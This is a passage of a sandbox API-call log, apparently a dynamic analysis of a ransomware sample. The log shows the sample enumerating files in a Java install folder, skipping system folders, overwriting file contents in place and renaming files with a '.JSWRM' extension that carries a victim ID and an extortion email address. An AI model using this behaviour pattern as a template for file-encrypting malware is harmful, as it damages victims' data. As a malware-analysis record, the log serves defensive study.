hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0071.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0071.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0071.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0071.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0071.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0071.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0071.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0071.717] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2e, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="README.txt", cAlternateFileName="")) returned 1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2=".") returned 1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="..") returned 1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="...") returned 1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="windows") returned -1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="recovery") returned -1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="perflogs") returned 1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="documents and settings") returned 1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="$RECYCLE.BIN") returned 1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="system volume information") returned -1 [0071.717] lstrcmpiW (lpString1="README.txt", lpString2="msocache") returned 1 [0071.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0071.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="README.txt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="README.txt", cchWideChar=10, lpMultiByteStr=0x345f2a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="README.txt", lpUsedDefaultChar=0x0) returned 10 [0071.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0071.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0071.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="README.txt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="README.txt", cchWideChar=10, lpMultiByteStr=0x345f278, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="README.txt", lpUsedDefaultChar=0x0) returned 10 [0071.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0071.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0071.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0071.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0071.718] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0071.718] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=46) returned 1 [0071.718] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0071.718] ReadFile (in: hFile=0x298, lpBuffer=0x2411c8, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2411c8*, lpNumberOfBytesRead=0x345ef6c*=0x20, lpOverlapped=0x0) returned 1 [0071.722] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.722] WriteFile (in: hFile=0x298, lpBuffer=0x2411c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x2411c8*, lpNumberOfBytesWritten=0x345ef68*=0x20, lpOverlapped=0x0) returned 1 [0071.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0071.722] CloseHandle (hObject=0x298) returned 1 [0071.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0071.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0071.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0071.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0071.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0071.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0071.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0071.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216ac0 | out: hHeap=0x1e0000) returned 1 [0071.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0071.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0071.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0071.723] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x210, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="release", cAlternateFileName="")) returned 1 [0071.723] lstrcmpiW (lpString1="release", lpString2=".") returned 1 [0071.723] lstrcmpiW (lpString1="release", lpString2="..") returned 1 [0071.723] lstrcmpiW (lpString1="release", lpString2="...") returned 1 [0071.723] lstrcmpiW (lpString1="release", lpString2="windows") returned -1 [0071.723] lstrcmpiW (lpString1="release", lpString2="recovery") returned 1 [0071.723] lstrcmpiW (lpString1="release", lpString2="perflogs") returned 1 [0071.723] lstrcmpiW (lpString1="release", lpString2="documents and settings") returned 1 [0071.723] lstrcmpiW (lpString1="release", lpString2="$RECYCLE.BIN") returned 1 [0071.723] lstrcmpiW (lpString1="release", lpString2="system volume information") returned -1 [0071.723] lstrcmpiW (lpString1="release", lpString2="msocache") returned 1 [0071.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="release", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0071.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="release", cchWideChar=7, lpMultiByteStr=0x345f2a8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="release", lpUsedDefaultChar=0x0) returned 7 [0071.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="release", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0071.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="release", cchWideChar=7, lpMultiByteStr=0x345f278, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="release", lpUsedDefaultChar=0x0) returned 7 [0071.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0071.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0071.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0071.724] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0071.724] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=528) returned 1 [0071.724] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x210) returned 0x209950 [0071.724] ReadFile (in: hFile=0x298, lpBuffer=0x209950, nNumberOfBytesToRead=0x210, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesRead=0x345ef6c*=0x210, lpOverlapped=0x0) returned 1 [0071.725] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.725] WriteFile (in: hFile=0x298, lpBuffer=0x209950*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesWritten=0x345ef68*=0x210, lpOverlapped=0x0) returned 1 [0071.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209950 | out: hHeap=0x1e0000) returned 1 [0071.725] CloseHandle (hObject=0x298) returned 1 [0071.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0071.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0071.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0071.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0071.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0071.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0071.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0071.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0071.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.726] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0071.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0071.726] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf9bd, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="THIRDPARTYLICENSEREADME-JAVAFX.txt", cAlternateFileName="THIRDP~1.TXT")) returned 1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2=".") returned 1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="..") returned 1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="...") returned 1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="windows") returned -1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="recovery") returned 1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="perflogs") returned 1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="documents and settings") returned 1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="$RECYCLE.BIN") returned 1 [0071.726] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="system volume information") returned 1 [0071.727] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpString2="msocache") returned 1 [0071.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0071.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0071.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpUsedDefaultChar=0x0) returned 34 [0071.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0071.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0071.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0071.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THIRDPARTYLICENSEREADME-JAVAFX.txt", lpUsedDefaultChar=0x0) returned 34 [0071.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0071.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0071.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0071.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0071.727] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0071.727] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=63933) returned 1 [0071.727] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf9b0) returned 0x24c1d0 [0071.727] ReadFile (in: hFile=0x298, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xf9b0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ef6c*=0xf9b0, lpOverlapped=0x0) returned 1 [0071.733] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.733] WriteFile (in: hFile=0x298, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xf9b0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ef68*=0xf9b0, lpOverlapped=0x0) returned 1 [0071.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0071.733] CloseHandle (hObject=0x298) returned 1 [0071.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0071.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0071.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0071.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0071.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0071.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0071.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0071.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0071.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0071.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0071.734] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0071.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0071.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0071.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.734] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, 